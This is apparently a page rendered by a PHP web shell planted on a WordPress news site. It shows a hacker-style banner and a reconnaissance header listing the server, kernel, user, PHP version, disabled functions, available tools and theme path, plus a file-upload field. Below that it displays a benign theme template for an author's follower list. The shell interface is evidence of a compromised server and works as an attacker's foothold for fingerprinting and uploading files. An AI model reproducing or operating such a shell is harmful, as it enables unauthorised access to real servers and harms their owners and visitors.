AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK
| Server IP : dzynews.com / Your IP : 216.73.217.105 Web Server : nginx/1.30.3 System : Linux cloud-tdkldl-avd6 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64 User : www ( 1000) PHP Version : 8.2.31 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/dzynews.com/wp-content/themes/archive-document/User/ |
Upload File : |
<?php
$user_id = get_query_var('author');
$paged = get_query_var('b2_paged');
$paged = $paged ? $paged : 1;
$pagename = get_query_var('b2_user_page');
$follow = get_user_meta($user_id,'zrz_followed',true);
$follow = is_array($follow) ? count($follow) : 0;
$_pages = ceil($follow/15);
?>
<div class="author-follow box b2-radius b2-pd" id="author-followers" ref="authorFollow" data-paged="<?php echo $paged; ?>" data-pages="<?php echo $_pages; ?>">
<ul>
<div class="button empty b2-loading empty-page text"></div>
</ul>
<div class="b2-pagenav mg-t" v-show="pages > 0" v-cloak style="padding:0">
<page-nav ref="commentPageNav" paged="<?php echo $paged; ?>" navtype="authorComments" pages="<?php echo $_pages; ?>" type="p" box=".author-follow ul" :opt="options" :api="api" url="<?php echo get_author_posts_url($user_id).'/'.$pagename; ?>" title=""></page-nav>
</div>
</div>